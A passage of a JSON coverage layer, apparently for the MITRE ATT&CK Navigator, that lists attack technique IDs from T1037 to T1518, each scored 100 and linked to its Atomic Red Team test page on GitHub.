d-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1041","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1091","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1187","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blo